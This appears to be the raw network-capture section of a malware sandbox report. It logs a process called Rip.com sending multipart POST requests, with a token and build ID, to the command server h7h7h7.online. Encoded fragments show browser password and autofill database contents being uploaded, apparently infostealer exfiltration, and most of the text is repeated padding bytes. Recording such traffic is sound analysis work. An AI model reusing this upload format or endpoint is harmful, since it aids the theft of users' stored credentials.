                                                                                                                                                                                                                                                                      Data Ascii: AYiCxEAAQYBDQQIAwgIDQgICAgJCAAvZXdEtBi3CqAAAAY4oGIfChEAAQYBDQQICAgIDQgICAgJBwAvZXdEtBi3CYAAAAYfCREAAQYBDQQICAgIDQgICAgJBgAvZXdEtBi3CIAAAAYeCBEAAQYIDQQICAgIDQgICAgJBQAvZXdEtBi3EAAABiIHEQABBgENBAgDCAgNCAgICAkEAC9lZQXyHUQGoAAABgPs5B8GEQABBgENBAgICAgNCAgICAkD
                                                                                                                                                                                                                                                                      2024-12-31 20:33:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                      2024-12-31 20:33:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                      2024-12-31 20:33:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                      2024-12-31 20:33:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                      2024-12-31 20:33:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                      2024-12-31 20:33:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                      2024-12-31 20:33:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                      2024-12-31 20:33:40 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                      Date: Tue, 31 Dec 2024 20:33:40 GMT
                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                      Connection: close


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      15192.168.2.449814116.203.13.1094437816C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-12-31 20:33:40 UTC280OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----s0rqq9zm79hv3ekxbs26
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                      Host: h7h7h7.online
                                                                                                                                                                                                                                                                      Content-Length: 55081
                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                      2024-12-31 20:33:40 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 73 30 72 71 71 39 7a 6d 37 39 68 76 33 65 6b 78 62 73 32 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 38 32 36 38 30 62 30 39 33 36 32 31 38 61 36 30 66 66 36 34 37 66 30 62 39 63 38 35 64 62 0d 0a 2d 2d 2d 2d 2d 2d 73 30 72 71 71 39 7a 6d 37 39 68 76 33 65 6b 78 62 73 32 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 73 30 72 71 71 39 7a 6d 37 39 68 76 33 65 6b 78 62 73 32 36 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                      Data Ascii: ------s0rqq9zm79hv3ekxbs26Content-Disposition: form-data; name="token"bc82680b0936218a60ff647f0b9c85db------s0rqq9zm79hv3ekxbs26Content-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------s0rqq9zm79hv3ekxbs26Cont
                                                                                                                                                                                                                                                                      2024-12-31 20:33:40 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                      2024-12-31 20:33:40 UTC16355OUTData Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 42 2f 67 41 4c 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                      Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpB/gALQAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                      2024-12-31 20:33:40 UTC6016OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                      2024-12-31 20:33:41 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                      Date: Tue, 31 Dec 2024 20:33:41 GMT
                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      2024-12-31 20:33:41 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      16192.168.2.449817116.203.13.1094437816C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-12-31 20:33:42 UTC281OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----hdbsje37900zu37qimyu
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                      Host: h7h7h7.online
                                                                                                                                                                                                                                                                      Content-Length: 142457
                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                      2024-12-31 20:33:42 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 68 64 62 73 6a 65 33 37 39 30 30 7a 75 33 37 71 69 6d 79 75 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 38 32 36 38 30 62 30 39 33 36 32 31 38 61 36 30 66 66 36 34 37 66 30 62 39 63 38 35 64 62 0d 0a 2d 2d 2d 2d 2d 2d 68 64 62 73 6a 65 33 37 39 30 30 7a 75 33 37 71 69 6d 79 75 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 68 64 62 73 6a 65 33 37 39 30 30 7a 75 33 37 71 69 6d 79 75 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                      Data Ascii: ------hdbsje37900zu37qimyuContent-Disposition: form-data; name="token"bc82680b0936218a60ff647f0b9c85db------hdbsje37900zu37qimyuContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------hdbsje37900zu37qimyuCont
                                                                                                                                                                                                                                                                      2024-12-31 20:33:42 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                      2024-12-31 20:33:42 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                      2024-12-31 20:33:42 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                      2024-12-31 20:33:42 UTC16355OUTData Raw: 76 62 6e 52 68 59 33 52 66 61 57 35 6d 62 79 41 6f 5a 33 56 70 5a 43 42 57 51 56 4a 44 53 45 46 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 4c 43 42 31 63 32 56 66 59 32 39 31 62 6e 51 67 53 55 35 55 52 55 64 46 55 69 42 4f 54 31 51 67 54 6c 56 4d 54 43 42 45 52 55 5a 42 56 55 78 55 49 44 41 73 49 48 56 7a 5a 56 39 6b 59 58 52 6c 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 6b 59 58 52 6c 58 32 31 76 5a 47 6c 6d 61 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 73 59 57 35 6e 64 57 46 6e 5a 56 39 6a 62 32 52 6c 49 46 5a 42 55 6b 4e 49 51 56 49 73 49 47 78 68 59 6d 56 73 49 46 5a 42 55 6b 4e 49 51 56
